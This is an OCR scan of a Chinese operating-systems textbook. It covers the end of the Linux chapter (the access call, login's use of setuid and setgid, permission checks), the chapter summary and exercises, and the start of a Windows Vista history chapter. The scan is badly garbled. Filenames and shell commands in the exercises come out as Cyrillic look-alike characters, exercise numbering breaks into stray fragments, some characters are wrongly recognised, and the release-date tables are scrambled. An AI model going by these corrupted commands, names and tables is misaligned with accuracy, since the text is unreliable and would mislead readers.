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access 系 统 调用 检验 用 实际 的 UID 和 GID 对 某 文件 是 否 拥有 特定 的 权限 。 对 于 根 用 户 所 拥有 的 并 设 
置 了 SETUID 的 程序 ， 我 们 需要 这 个 系统 调用 来 避免 安全 违例 。 这 样 的 程序 可 以 做 任何 事情 ， 有 时 需要 
这 样 的 程序 判断 是 否 允许 用 户 执行 某 种 访问 。 让 程序 通过 访问 判断 显然 是 不 行 的 ， 因 为 这 样 的 访问 总 能 
成 功 。 使 用 access 系 统 调用 ， 程 序 就 能 知道 用 实际 的 UID 和 GID 是 否 能 够 以 一 定 的 权限 访问 文件 。 

接 下 来 的 四 个 系统 调用 返回 实际 的 和 有 效 的 UID 和 GID。 最 后 的 三 个 只 能 够 被 超级 用 户 使 用 ， 它 们 
改变 文件 的 所 有 者 以 及 进程 的 UID 和 GID。 


10.7.3 Linux 中 的 安全 实现 

当 用 户 登录 的 时 候 ， 登 录 程 序 login (为 根 用 户 所 有 且 SETUID 打 开 ) 要 求 输入 登录 名 和 密码 。 它 首 
先 计算 密码 的 散 列 值 , 然后 在 /etc/passwd 文 件 中 查找 , 看 是 否 有 相 匹 配 的 项 (网络 系统 工作 得 稍 有 不 同 ) 。 
使 用 散 列 的 原因 是 防止 密码 在 系统 中 以 非 加 密 的 方式 存在 。 如 果 窗 码 正确 ， 登 录 程序 在 /etc/passwd 中 读 
取 该 用 户 选 择 的 shell 程 序 的 名 称 ， 例 如 可 能 是 bash， 但 是 也 有 可 能 是 其 他 的 shell， 例 如 csh 或 者 ksh。 然 
后 登录 程序 使 用 setuid 和 setgid 来 使 自己 的 UID 和 GID 变 成 用 户 的 UID 和 GID (注意 ， 它 一 开始 的 时 候 是 
根 用 户 所 有 且 SETUID 打 开 )。 然 后 它 打开 键盘 作为 标准 输入 (文件 描述 符 0) ， 屏 幕 为 标准 输出 (文件 描 
述 符 1) ， 屏 幕 为 标准 错误 输出 (文件 找 述 符 2)。 最 后 ， 执 行 用 户 选择 的 shell 程 序 ， 因 此 终止 自己 。 

到 这 里 ， 用 户 选择 的 shell 已 经 在 运行 ， 并 且 被 设置 了 正确 的 UID 和 GID， 标 准 输入 、 标 准 输出 和 标 
准 错误 输出 都 被 设置 成 了 默认 值 。 它 创建 任何 子 进程 (也 就 是 用 户 输入 的 命令 ) 都 将 自动 继承 shell 的 
UID 和 GID， 所 以 它们 将 拥有 正确 的 UID 和 GID， 这 些 进程 创建 的 任何 文件 也 具有 这 些 值 。 

当 任 何 进程 想 要 打开 一 个 文件 ， 系 统 首先 将 文件 的 i 节点 所 记录 的 保护 位 与 用 户 的 有 效 UID 和 有 效 
GID 对 比 ， 来 检查 访问 是 否 被 允许 。 如 果 允 许 访问 ， 就 打开 文件 并 且 返 回 文件 描述 符 ， 否 则 不 打开 文件 ， 
返回 -1。 在 接 下 来 的 read 和 write 中 不 再 检查 权限 。 因 此 ， 当 一 个 文件 的 保护 模式 在 它 被 打开 后 修改 ， 
新 模式 将 无 法 影响 已 经 打开 该 文件 的 进程 。 

Linux 安 全 模型 及 其 实现 在 本 质 上 跟 其 他 大 多 数 传统 的 UNIX 系统 相同 。 

10.8 小 结 

Linux 一 开始 是 一 个 开源 的 完全 复制 UNIX 的 系统 ， 而 今天 它 已 经 广泛 应 用 于 各 种 系统 ， 从 笔记 本 到 
超级 计算 机 。 它 有 三 种 主要 接口 ，shell、C 函 数 库 和 系统 调用 。 此 外 ， 通常 使 用 图 形 用 户 界面 以 简化 用 
户 与 系统 的 交互 。shell 允许 用 户 输入 命令 来 执行 。 这 些 命令 可 能 是 简单 的 命令 、 管线 或 者 复杂 的 命令 结 
构 。 输 入 和 输出 可 以 被 重 定向 。C 函 数 库 包 括 了 系统 调用 和 许多 增强 的 调用 ， 例 如 用 于 格式 化 输出 的 
Printf。 实 际 的 系统 调用 接口 是 依赖 于 体系 结构 的 ， 在 x86 平 台 上 大 约 有 250 个 系统 调用 ， 每 个 系统 调用 
做 需要 做 的 事情 ， 不 会 做 多 余 的 事情 。 

Linux 中 的 关键 概念 包括 进程 、 内 存 模型 、L/O 和 文件 系统 。 进 程 可 以 创建 子 进程 ， 形 成 一 棵 进程 树 。 
Linux 中 的 进程 管理 与 其 他 的 UNIX 系 统 不 太一 样 ，Linux 系统 把 每 一 个 执行 体 一 一 单线 程 进 程 ， 或 者 多 
线程 进程 中 的 每 一 个 线程 或 者 内 核 一 一 看 做 不 同 的 任务 。 一 个 进程 ， 或 者 统称 为 一 个 任务 ， 通 过 两 个 关 
键 的 部 分 来 表示 ， 即 任务 结构 和 描述 用 户 地 址 空间 的 附加 信息 。 前 者 常 驻 内 存 ， 后 者 可 能 被 换 出 内 存 。 
进程 创建 是 通过 复制 父 进 程 的 任务 结构 ， 然 后 将 内 存 映像 信息 设置 为 指向 父 进 程 的 内 存 映像 。 内 存 映像 
页 面 的 真正 复制 仅 当 在 共享 不 允许 和 需要 修改 内 存单 元 时 发 生 。 这 种 机 制 称 为 写 时 复制 。 进程 调度 采用 
基于 优先 级 的 算法 ， 给 予 交 互 式 进程 更 高 的 优先 级 。 

每 个 进程 的 内 存 模型 由 三 个 部 分 组 成 : 代码 、 数 据 和 堆栈 。 内 存 管理 采用 分 页 式 。 一 个 常 驻 内 存 的 
表 跟 踪 每 一 页 的 状态 ， 页 面 守护 进程 采用 一 种 修改 过 的 双 指 针 时 钟 算法 保证 系统 有 足够 多 的 空闲 页 。 

可 以 通过 特殊 文件 访问 MO 设备 ， 每 个 设备 都 有 一 个 主 设备 号 和 次 设备 号 。 块 设备 IO 使 用 内 存 缓存 
磁盘 块 ， 以 减少 访问 磁盘 的 次 数 。 字 符 MO 可 以 工作 在 原始 模式 ， 或 者 字符 流 可 以 通过 行规 则 加 以 修改 。 
网 络 设备 稍 有 不 同 ， 它 关联 了 整个 网 络 协议 模块 来 处 理 网 络 数据 包 流 。 

文件 系统 由 文件 和 目录 所 组 成 的 层次 结构 组 成 。 所 有 磁盘 都 挂 载 到 一 个 有 惟一 根 的 目录 树 中 。 文 件 
可 以 从 文件 系统 的 其 他 地 方 连接 到 一 个 日 录 下 。 要 使 用 文件 ， 首 先 要 打开 文件 ， 这 会 产生 个 文件 描述 
符 用 于 接 下 来 的 读 和 写 。 文 件 系统 内 部 主要 使 用 三 种 表 : 文件 描述 符 表 、 打开 文件 描述 表 和 i 节点 表 。 
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其 中 i 节 点 表 是 最 重要 的 表 ， 包 含 了 文件 管理 所 需要 的 所 有 信息 和 文件 位 置信 息 。 目 录 和 设备 ， 以 及 其 


保护 基于 对 所 有 者 、 同 组 用 户 和 其 他 人 的 读 、 写 和 执行 的 访问 控制 。 对 目录 而 言 ， 执 行 位 指示 是 否 


他 特殊 文件 也 都 表示 为 文件 。 

人 允许 搜索 。 

习题 

1. 一 个 目录 包含 以 下 的 文件 : 
aardvark feret koala рогроіѕе ипісогп 
bonefish ргипіоп Пата иаскег vicuna 
capybara hyena marmot rabbit weasel 
dingo ibex nuthatch seahorse уак 
emu jellyfish ostrich tuna zebu 


哪些 文件 能 通过 命令 ls [abc]*e* 被 罗列 出 来 ? 
2. 下 面 的 Linux shell 管 线 的 功能 是 什么 ? 
grep nd хуг | мс -| 


: 写 一 个 能 够 在 标准 输出 上 打印 文件 z 的 第 八 行 
的 Linux 管 线 。 

.Linux 在 标准 输出 和 标准 错误 对 于 终端 都 是 默认 
的 情况 下 是 怎么 区 分 标准 输出 和 标准 错误 的 ? 
.一 个 用 户 在 终端 键 信 了 如 下 的 命令 : 
alblc& 
dlelf& 

在 shell 处 理 完 这 些 命令 后 ， 有 多 少 新 的 进程 在 
运行 ? 

当 Linux shell 启 动 一 个 进程 ， 它 把 它 的 环境 变 
量 ， 如 HOME 放 到 进程 栈 中 ， 使 得 进程 可 以 找 
到 它 的 home 目 录 是 哪个 。 如 果 这 个 进程 之 后 进 
行 派生 ， 那 么 它 的 子 进程 也 能 自动 地 得 到 这 些 
变量 吗 ? 

.在 如 下 的 条 件 下 : 文本 大 小 = 100KB ， 数 据 大 
小 =20KB， 栈 大 小 = 10KB ， 任 务 结构 = IKB， 
用 户 结构 = 5KB， 一 个 传统 的 UINX 系 统 要 花 多 
长 时 间 派 生 一 个 子 进程 ”内 核 陷阱 和 返回 的 时 
间 用 lms， 机 器 每 50ns 就 可 以 复制 一 个 32 位 的 
字 。 共 享 文本 段 ， 但 是 不 共享 数据 段 和 堆栈 段 。 
. 当 多 兆 字 节 程序 变 得 越 来 越 普遍 ， 花 在 执行 

fork 系 统 调用 以 及 复制 调用 进程 的 数据 段 和 堆 

栈 段 的 时 间 也 成 比例 地 增长 。 当 在 Linux 中 执行 

fork， 父 进程 的 地 址 空间 是 没有 被 复制 的 ， 不 

像 传统 的 fork 语 义 那样 。Linux 是 怎样 防止 子 进 

程 做 一 些 会 彻底 改变 fork 语 义 的 行动 的 ? 

当 一 个 进程 进入 优 死 状态 后 ， 取 走 它 的 内 存 有 

意义 吗 ? 为 什么 ? 

10. 你 认为 为 什么 Linux 的 设计 者 禁止 一 个 进程 向 

不 属于 它 的 进程 组 的 另 一 个 进程 发 信号 呢 ? 


w 


a 


Р 


a 


м 


о 


е 


п. 


= 


19. 


2 


2: 


N 


23. 


-个 系统 调用 常用 一 个 软件 中 断 (陷阱 ) 指令 
实现 。 一 个 普通 的 过 程 调用 在 Pentium 的 硬件 
上 也 能 使 用 吗 ? 如果 能 使 用 ， 在 哪 种 条 件 下 ? 
如 何 使 用 ? 如 果 不 能 ， 请 说 明 原因 。 


通常 情况 下， 你 认为 守护 进程 比 交互 进程 具有 


更 高 的 优先 级 还 是 更 低 的 优先 级 ?为 什么 ? 


. 当 一 个 新 进程 被 创建 ， 它 一 定 会 被 分 配 一 个 惟 


一 的 整 型 数 作为 它 的 PID。 在 内 核 里 有 一 个 每 
个 进程 创建 时 就 递增 的 计数 器 够 用 么 ?其 中 计 
数 器 作为 新 的 PID。 讨 论 你 的 结论 。 


.在 每 个 任务 结构 中 的 进程 项 中 ， 父 进程 的 PID 


被 储存 。 为 什么 ? 


‚ 当 响 应 一 个 传统 的 UNIX fork 调 用 时 ，Linux 的 


clone 命 令 会 使 用 什么 样 的 sharing_flags 位 的 组 合 ? 


+ Linux 调 度 器 在 2.4 版 本 和 2.6 版 本 的 内 核 间 经 历 


了 一 个 大 整修 。 现 在 的 调度 器 可 以 在 O(1) 时 间 
做 出 调度 决定 。 请 解释 为 什么 会 这 样 ? 


- 当 引导 Linux (或 者 大 多 数 其 他 操作 系统 在 引导 


М) 时 ， 在 0 号 扁 区 的 引导 加 载 程序 首先 加 载 一 
个 引导 程序 ， 这 个 程序 之 后 会 加 载 操作 系统 。 
这 多 余 的 一 步 为 什么 是 必 不 可 少 的 ? 0 号 扁 区 的 
引导 加 载 程序 直接 加 载 操作 系统 会 更 简单 的 。 


- 某 个 编辑 器 有 100KB 的 程序 文本 ，30KB 的 初始 


化 数据 和 50KB 的 BSS。 初 始 堆栈 是 10KB。 假 
设 这 个 编辑 器 的 三 个 复制 是 同时 开始 的 。(a) 
如 果 使 用 共享 文本 , 需要 多 少 物理 内 存 呢 ? (b) 
如 果 不 使 用 共享 文本 又 需 多 少 物理 内 存 呢 ? 


‚ 在 Linux 中 打开 文件 描述 符 表 为 什么 是 必要 的 呢 ? 
20. 


在 Linux 中 ， 数 据 段 和 堆栈 段 被 分 页 并 交换 到 一 
个 特别 的 分 页 磁盘 或 分 区 的 暂时 副本 上 ， 但 是 
代码 段 却 使 用 了 可 执行 二 进 制 文件 。 为 什么 ? 


“描述 一 种 使 用 mmap 和 信号 量 来 构造 一 个 进程 


内 部 间 通 信 机 制 的 方法 。 


:一 个 文件 使 用 如 下 的 mmap 系 统 调用 映射 ; 


mmap(65536,32768,READ,FLAGS 14,0) 
每 页 有 8KB。 当 在 内 存 地 址 72000 处 读 一 个 字 
节 时 ， 访 问 的 是 文件 中 的 哪个 字 节 ? 

在 前 一 个 问题 的 系统 调用 执行 后 ， 执 行 
munmap(65535,8192) 调 用 会 成 功 吗 ? 如 果 成 
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功 ,文件 的 哪些 字 节 会 保持 映射 ?如果 不 成 功 ， 
为 什么 会 失败 ? 

24. 一 个 页 面 故障 会 导致 错误 进程 终止 吗 ? ШЖ 
会 ， 举 一 个 例子 。 如 果 不 会 ， 请 解释 原因 。 
25. 在 内 存 管理 的 伙伴 系统 中 ， 两 个 相 邻 的 同样 大 
小 的 空闲 内 存 块 有 没有 可 能 同时 存在 而 不 会 被 
合并 到 一 个 块 中 ?如 果 有 解释 是 怎么 样 的 情 

况 。 如 果 没 有 可 能 ， 说 明 为 什么 不 可 能 。 

26. 据说 在 代码 段 中 分 页 分 区 要 比分 页 文件 性 能 更 
好 。 为 什么 呢 ? 

27. 举 两 个 例子 说 明 相对 路 径 名 比 绝对 路 径 名 有 优势 。 

28. 以 下 的 加 锁 调 用 是 由 一 个 进程 集合 产生 的 ， 对 
于 每 个 调用 ， 说 明 会 发 生 什 么 事情 。 如 果 一 个 
进程 没 能 够 得 到 锁 ， 它 就 被 阻塞 
a) A 想 要 0 到 10 字 节 处 的 一 把 共享 锁 。 

b) B 想 要 20 到 30 字 节 处 的 一 把 互 斥 锁 。 
c) C 想 要 8 到 40 字 节 处 的 一 把 共享 锁 。 
d) A 想 要 25 到 35 字 节 处 的 一 把 共享 锁 。 
е) B 想 要 8 字 节 处 的 一 把 互 斥 锁 。 

29. 考虑 图 10-26c 中 的 加 锁 文 件 。 假 设 一 个 进程 党 
试 对 10 和 11 字 节 加 锁 然后 阻塞 。 那 么 ， 在 C 释 
放 它 的 锁 前 ， 还 有 另 一 个 进程 尝试 对 10 和 11 字 
节 加 锁 然 后 阻塞 。 在 这 种 情况 下 语义 方面 会 产 
生 什么 问题 ? 提出 两 种 解决 方法 并 证 明 。 

30. 假设 lseek 系 统 调用 在 一 个 文件 中 寻找 一 个 负 
的 偏 移 量 。 给 出 两 种 可 能 的 处 理 方法 。 

31. 如 果 一 个 Linux 文 件 拥 有 保护 模式 755 ( 八 进 
制 )， 文 件 所 有 者 、 所 有 者 所 在 组 以 及 其 他 每 
个 用 户 都 能 对 这 个 文件 做 什么 ? 

32. 一 些 磁带 驱动 拥有 编号 的 块 ， 能 够 在 原 地 重 写 
一 个 特定 块 同时 不 会 影响 它 之 前 和 之 后 的 块 。 
这 样 一 个 设备 能 持 有 一 个 已 加 载 的 Linux 文 件 
系统 吗 ? 

33. 在 图 10-24 中 链接 之 后 Fred 和 Lisa 在 他 们 各 自 的 
目录 中 都 能 够 访问 文件 x。 这 个 访问 是 完全 对 
称 的 吗 ， 也 就 是 说 其 中 一 个 人 能 对 文件 做 的 事 
情 另 一 个 人 也 可 以 做 ? 

34. 正如 我 们 看 到 的 ， 绝 对 路 径 名 从 根 目录 开始 查 
找 ， 而 相对 路 径 名 从 工作 目录 开始 查找 。 提 供 
一 种 有 效 的 方法 实现 这 两 种 查找 。 

35. 当 文 件 /usr/ast/work/f 被 打开 ， 读 i 节点 和 目录 
块 时 需要 一 些 磁盘 访问 。 在 根 节点 的 i 节点 始 
终 在 内 存 中 以 及 所 有 的 目录 都 是 一 个 块 的 大 小 
这 样 的 假设 下 计算 需要 的 磁盘 访问 数量 。 

36. 一 个 Linux i 节点 有 12 个 磁盘 地 址 放 数 据 块 ， 还 
有 一 级 、 二 级 和 三 级 间接 块 。 如 果 每 一 个 块 能 


放 256 个 磁盘 地 址 ， 假 设 一 个 磁盘 块 的 大 小 是 

1KB， 能 处 理 的 最 大 文件 的 大 小 是 多 少 ? 

.在 打开 文件 的 过 程 中 ，i 节 点 从 磁盘 中 被 读 出 ， 

然后 放 入 内 存 中 的 i 节点 表 里 。 这 个 表 中 有 些 域 

在 磁盘 中 没有 。 其 中 一 个 是 计数 器 ， 用 来 记录 i 

节点 已 经 被 打开 的 次 数 。 为 什么 需要 这 个 域 ? 

38. 在 多 CPU 平台 上 ，Linux 为 每 个 CPU 维护 一 个 
runqueue。 这 是 个 好 想法 吗 ? 请 解释 你 的 答案 。 

39. pdflush 线 程 可 以 被 周期 性 地 唤醒 ， 把 多 于 30 秒 
的 旧 页 面 写 回 到 磁盘 。 这 个 为 什么 是 必要 的 ? 

40. 在 系统 崩溃 并 重启 后 ， 通 常 一 个 恢复 程序 将 运 
行 。 假 设 这 个 程序 发 现 一 个 磁盘 i 节点 的 连接 
数 是 2, 但 是 只 有 一 个 目录 项 引用 了 这 个 i 节 点 。 
它 能 够 解决 这 个 问题 吗 ? 如 果 能 ， 该 怎么 做 ? 

41. 猪 一 下 哪个 Linux 系 统 调用 是 最 快 的 ? 

42. 对 一 个 从 来 没有 被 连接 的 文件 取消 连接 可 能 
m? 会 发 生 什 么 ? 

АЗ. 基于 本 章 提供 的 信息 ， 如 果 一 个 Linux ext2 文 
件 系统 放 在 一 个 1.44MB 的 软盘 上 ， 用 户 文件 
数据 最 大 能 有 多 少 可 以 储存 在 这 个 盘 上 ? 假设 
磁盘 块 的 大 小 是 1IKB。 

44. 考虑 到 如 果 学 生成 为 超级 用 户 会 造成 的 所 有 麻 

烦 ， 为 什么 这 个 概念 还 会 出 现 ? 

一 个 教授 通过 把 文件 放 在 计算 机 科 的 

тт коны 与 

学 生 共享 文件 。 一 天 他 意识 到 前 一 天 放 在 

рача еч 了 。 他 改变 了 权 

限 并 验证 了 这 个 文件 与 他 的 原件 是 一 样 的 。 第 

二 天 他 发 现 文件 已 经 被 修改 了 。 这 种 情况 为 什 

么 会 发 生 ， 又 如 何 能 预防 呢 ? 

46. Linux 支 持 一 个 系统 调用 fsuid。setuid 准 许 使 
用 者 拥有 与 他 运行 的 程序 相关 的 有 效 id 的 所 有 
权利 。 与 setuid 不 同 ，fsuid 准 许 正在 运行 程序 
的 使 用 者 拥有 特殊 的 权利 ， 只 能 够 访问 文件 。 


3 


з 


45. 


& 


这 个 特性 为 什么 有 用 ? 

47. 写 一 个 允许 简单 命令 执行 的 最 小 的 shell， 也 要 
使 这 些 命令 能 在 后 台 执行 。 

48. 使 用 汇编 语言 和 BIOS 调 用 ， 写 一 个 在 


Pentinum 类 计算 机 上 从 软盘 上 引导 自己 的 程 
序 。 这 个 程序 应 该 使 用 BIOS 调 用 来 读 取 键盘 
以 及 回应 键入 的 字符 ， 只 是 证 明 这 个 程序 确实 
在 运行 。 

49. 写 一 个 能 通过 串口 连接 两 台 Linux 计 算 机 的 哑 
(dumb) 中 断 程序 。 使 用 POSIX 终 端 管理 调用 
来 配置 端口 。 


50. 写 一 个 客户 一 服务 器 应 用 程序 ， 应 答 请 求 时 能 
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通过 套 接 字 传 输 一 个 大 文件 。 使 用 共享 内 存 的 
方法 重新 实现 相同 的 应 用 程序 。 你 觉得 哪个 版 
本 性 能 更 好 ? 为 什么 ? 使 用 你 写 好 的 代码 和 不 
同 的 文件 大 小 进行 性 能 的 测量 。 你 观察 到 了 什 
么 ? 你 认为 在 Linux 内 核 中 发 生 了 什么 导致 这 
样 的 行为 ? 

51. 实 现 一 个 基本 的 用 户 级 线程 库 ， 该 线程 在 
Linux 的 上 层 运行 。 库 的 API 应 该 包含 函数 调用 ， 
如 mythreads_init、mythreads_create、 
mythreads_join 、mythreads_exit、 
mythreads_yield、mythreads_self， 可 能 还 


有 一 些 其 他 的 。 进 一 步 实现 这 些 同 步 变 量 ， 以 
便 用 户 能 使 用 安全 的 并 发 操作 : mythreads_ 
mutex_init, mythreads_mutex_lock, 
mythreads_ mutex_unlock。 在 开始 前 ， 清 晰 
地 定义 API 并 说 明 每 个 调用 的 语义 。 接 着 使 用 
简单 的 轮转 抢占 调度 器 实现 用 户 级 的 库 。 还 需 
要 利用 该 库 编写 一 个 或 更 多 的 多 线程 应 用 程 
序 ， 用 来 测试 线程 库 。 最 后 ， 用 另 一 个 像 本 章 
描述 的 Linux2.6 O(1) 的 调度 策略 替换 简单 的 调 
度 策略 。 使 用 每 种 调度 器 时 比较 你 的 应 用 程序 
的 性 能 。 


第 11 章 实例 研究 2: Windows Vista 


Windows 是 一 个 现代 的 操作 系统 ， 可 以 运行 在 消费 型 或 商业 型 桌面 计算 机 和 企业 服务 器 上 。 最 新 
的 桌面 版 本 是 Windows Vista。Windows Vista 的 服务 器 版 本 称 为 Windows Server 2008。 在 本 章 中 我 们 将 
分 析 Windows Vista 的 各 个 方面 ,从 历史 简 述 开始 , 然后 接 下 来 是 系统 的 架构 。 在 此 之 后 我 们 将 看 看 进程 、 
内 存 管理 、 缓 存 、 输 入/ 输 出、 文件 系统 ， 最 终 我 们 还 将 关注 一 下 安全 。 


11.1 Windows Vista 的 历史 

微软 公司 为 桌面 计算 机 和 服务 器 开发 的 Windows 操 作 系统 可 以 划分 为 三 个 时 代 。 MS-DOS、 基 于 
MS-DOS 的 Windows 和 基于 NT 的 Windows。 从 技术 上 来 说 ， 以 上 的 每 一 种 系统 与 其 他 系统 都 有 本 质 的 不 
同 。 在 个 人 计算 机 历史 中 不 同 的 时 代 ， 每 一 种 系统 都 占据 了 主导 地 位 。 图 11-1 显 示 的 是 微软 适用 于 桌面 
计算 机 的 主要 操作 系统 的 发 布 日 期 (不 包括 微软 为 UNIX 使 用 的 Xenix 版 本 ， 被 微软 于 1987 年 出 售 给 SCO)。 
以 下 我 们 简要 描述 表 中 显示 出 的 每 个 时 代 。 


年 份 | MS-DOS 基于 MS-DOS 的 Windows | 基于 NT 的 Windows | 注 解 
1981 | MS-DOS 1.0 最 初 是 为 [BM PC 发 布 
1983 | MS-DOS20 支持 РС/ХТ 

1984 | MS-DOS 3.0 | 支持 PC/AT 

1990 Windows 3.0 HERRE THE 
1991 | м5-р0550 | _ 增加 内 存 管理 

1992 Windows 3.1 只 能 在 286 或 以 上 运行 
1993 Windows МТ 3.1 

1995 | MS-DOS70 | Windows 95 ЈЕ | 做 入 在 Win 95 中 的 MS-DOS 
1996 Windows NT 4.0 

1998 | Windows98 

2000 | MS-DOS 8.0 Windows Me Windows 2000 | Win Me 不 如 Win 98 
2001 Windows ХР tT Windows 98 
2006 | Windows Vista 


11-1 微软 桌面 PC 的 主要 操作 系统 的 发 布 日 期 


11.1.1 20 世 纪 80 年 代 : MS-DOS 

20 世 纪 80 初 期 的 BM， 是 那 时 世界 上 最 大 和 最 强 的 计算 机 公司 ， 开 发 出 基于 Intel 8088 微 处 理 器 的 
个 人 计算 机 。 自 从 1970 年 中 期 开始 ， 微软 成 为 在 8080 和 Z-80 等 8 位 微 处 理 器 上 提供 BASIC 编 程 语言 的 领 
导 者 。 当 IBM 接 治 微 软 关于 在 新 型 的 计算 机 上 授权 使 用 BASIC 的 时 候 ， 微软 赞同 并 且 建 议 TBM 联 系 
Digital Research 公 司 以 便于 使 用 它 的 CP/M 操 作 系统 ， 那 时 微软 还 没有 进入 操作 系统 领域 . IBM 这 样 做 了 ， 
但 是 Digital Research 公 司 的 总 裁 Gary Kildall 非 常 繁忙 ， 没有 时 间 与 BM 继续 商讨 ， 所 以 IBM 转 回 到 微软 。 
在 很 短 的 时 间 之 内 ,微软 从 一 家 本 地 公司 西雅图 计算 机 产品 (Seatle Computer Products) 买 到 了 一 份 CPIM 
的 拷贝 ， 移植 到 IBM PC 中 ， 并 且 授权 IBM 使 用 。 这 个 产品 被 命名 为 MS-DOS 1.0 (Microsoft Disk 
Operating System) 并 且 在 1981 年 与 第 一 款 IBM PC 一 同 发 售 。 

MS-DOS 是 一 款 16 位 、 实 时 模式 、 单 一 用 户 、 命 令 行 式 的 操作 系统 ， 包含 8KB 的 内 存 驻 留 编码 。 在 
接 下 来 的 十 年 里 ，PC 和 MS-DOS 继 续 发 展 ， 增加 了 更 多 的 特性 和 性 能 。 在 1986 年 当 IBM 基 于 Intel 286 开 
始 设计 PC/AT 时 ，MS-DOS 已 经 增长 到 36KB， 但 是 仍然 是 命令 行 式 ， 同 一 时 刻 只 能 运行 一 个 应 用 程序 的 
操作 系统 。 
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11.1.2 20 世 纪 90 年 代 : 基于 MS-DOS 的 Windows 

由 于 受到 了 斯 坦 福 研究 学 院 和 Xerox PARC 研 究 的 图 形 用 户 界面 的 启发 ， 以 及 他 们 取得 的 商业 产品 一 一 
蕴 果 的 Lisa 和 Macintosh， 微 软 决定 增加 MS-DOS 的 图 形 用 户 界面 ， 并 命名 为 Windows。Windows 最 初 的 
两 个 版 本 (1985 和 1987) 并 不 非常 成 功 ， 因 为 它们 受到 了 那 时 的 PC 硬件 的 限制 。 在 1990 年 微软 为 Intel 
386 发 布 了 Windows 3.0 版 本 ， 并 且 在 六 个 月 内 销售 了 一 百 万 份 拷贝 。 

Windows 3.0 不 是 一 款 真正 的 操作 系统 ， 而 是 在 MS-DOS 上 应 用 了 图 形 用 户 界面 ， 它 仍然 受到 机 器 和 
文件 系统 的 控制 。 所 有 的 程序 在 同一 地 址 空间 内 运行 而 且 它 们 中 的 任何 一 处 bug 都 会 使 得 整个 系统 崩溃 。 

在 1995 年 8 月 ，Windows 95 发 布 了 。 它 在 一 个 成 熟 的 系统 内 包括 了 许多 特性 ， 包 括 虚 拟 内 存 、 进 程 
管理 、 多 程序 设计 、32 位 的 程序 界面 。 然 而 ， 它 仍然 缺少 安全 性 ， 并 且 在 操作 系统 和 应 用 程序 之 间 提供 
了 很 少 的 隔离 措施 。 因 此 这 些 不 稳定 的 问题 仍然 存在 ， 在 随后 发 布 的 Windows 98 和 Windows Me 中 也 一 
样 。 在 它们 中 MS-DOS 仍 然 以 16 位 汇编 编码 运行 在 Windows 操 作 系 统 核心 中 。 


11.1.3 21 世 纪 : 基于 NT 的 Windows 

在 20 世 纪 80 年 代 末 , 微软 认识 到 继续 开发 以 MS-DOS 为 核心 的 操作 系统 不 是 一 个 最 佳 商业 发 展 方向 。 
计算 机 硬件 在 不 断 地 提高 计算 速度 和 能 力 ， 最 后 PC 市 场 会 出 现 同 课 面 工作 站 和 企业 服务 器 的 碰撞 ， 而 在 
这 些 领域 UNIX 操 作 系统 是 占 优势 的 。 微 软 同 时 也 注意 到 Intel 微 处 理 器 家 族 可 能 不 再 具有 很 大 的 竞争 优 
势 ， 因 为 它 已 经 受到 了 RISC 架 构 的 挑战 。 为 了 讨论 这 些 因素 ， 微 软 从 DEC 公司 招聘 了 一 些 由 Dave 
Cutler 带 领 的 工程 师 ， 他 是 DEC 的 VMS 操 作 系 统 的 主要 架构 设计 者 。Cutler 被 指派 开发 一 种 全 新 的 32 位 
操作 系统 用 于 实现 OS/2， 微 软 当时 联合 IBM 在 合作 开发 OS/2 操 作 系 统 的 API 接 口 。 最 初 的 设计 文档 中 ， 
Cutler 的 团队 称 这 种 操作 系统 为 NT OS/2。 

Cutler 的 系统 由 于 包含 很 多 新 技术 被 称 作 NT (New Technology) (也 因为 最 初 的 目标 处 理 器 是 新 型 的 Intel 
860 代 码 名 称 是 NI0)。NT 开 发 的 重点 是 方便 地 在 [E | DERFRA ЗЕ 
不 同 的 处 理 器 之 间 切 换 和 着 重 在 安全 性 和 可 靠 性 。 | 1973 | RSX-11M 16 位 、 多 用 户 、 实 时 、 交 换 性 | 
方面 ， 它 同样 兼容 基于 MS-DOS 的 Windows 版 本 。 1978 | VAX/VMS 32 位 、 虚 拟 内 存 
Cutler 的 DEC 工作 背景 展现 在 多 个 方面 ， 有 不 止 1987 | VAXELAN 实时 
一 处 体现 出 NT 系统 的 设计 和 VMS 以 及 其 他 系统 1988 | PRISM/Mica | 在 MIPS/Ultrix 热 潮 中 被 取消 
设计 的 相似 性 ， 如 图 11-2 所 示 。 图 11-2 由 Dave Cutler 开发 的 DEC 操作 系统 

当 DEC 的 工程 师 (包括 后 来 的 律师 ) 看 到 
NT 与 YMS 是 如 此 相似 时 (也 包括 他 们 没有 发 布 的 版 本 MICA)， 一 场 有 关于 微软 使 用 了 DEC 的 知识 产权 
的 争论 在 DEC 和 微软 之 间 展开 了 。 最 终 的 结果 是 庭 外 和 解 。 另 外 ， 微 软 同意 在 一 段 时 间 内 支持 NT 系统 
在 DEC 的 Alpha 机 器 上 的 使 用 。 然 而 ， 这 些 都 不 能 把 DEC 从 它 在 微型 计算 机 上 的 错误 定位 和 轻视 个 人 计 
算 机 的 观点 中 挽救 回来。 如 同 DEC 的 创始 者 Ken Olsen 在 1977 年 评论 的 :“ 没 有 人 会 想 要 在 家 里 拥有 计算 
机 。” 这 使 得 DEC 在 1998 年 被 出 售 给 康 柏 (Compaq) ， 而 后 者 稍 后 又 被 惠 善 【Hewlett-Packard) 收购 。 

那些 仅仅 熟悉 UNIX 的 程序 员 发 现 NT 的 架构 非常 不 同 。 这 不 仅仅 是 因为 受到 了 VMS 的 影响 ， 也 是 因 
为 在 当时 计算 机 系统 的 不 同 导致 设计 不 同 。UNIX 是 在 20 世 纪 70 年 代为 单 处 理 器 、16 位 、 微 内 存 、 切 换 系 
统 设计 的 ， 那 时 进程 是 最 小 的 并 行 和 组 成 单元 。 而 且 fork/exec 是 并 不 消耗 很 多 资源 的 操作 命令 (因为 切 
换 系统 经 常 被 通过 磁盘 拷贝 )。NT 是 在 20 世 纪 90 年 代 初 期 设计 的 ， 当 时 多 处 理 器 、32 位 、 大 容量 存储 、 
虚拟 内 存 系统 已 经 非常 普及 。 在 NT 系统 中 ， 线 程 是 并 行 单元 ， 动 态 连接 库 是 组 成 的 单元 ， 并 且 fork/exec 
是 被 通过 单一 操作 命令 来 实现 创建 一 个 全 新 的 进程 ， 然 后 运行 另外 一 个 程序 而 不 需要 首先 复制 一 个 指 贝 。 

第 一 个 基于 NT 的 Windows 版 本 (Windows NT 3.1) 在 1993 年 发 布 ， 它 被 称 作 3.1 是 因为 那 时 的 消费 
版 本 是 3.1。 与 1BM 合 作 开发 的 版 本 也 建立 了 ， 虽 然 OS/2 的 界面 仍然 被 支持 ， Windows АРІ 的 32 位 扩展 
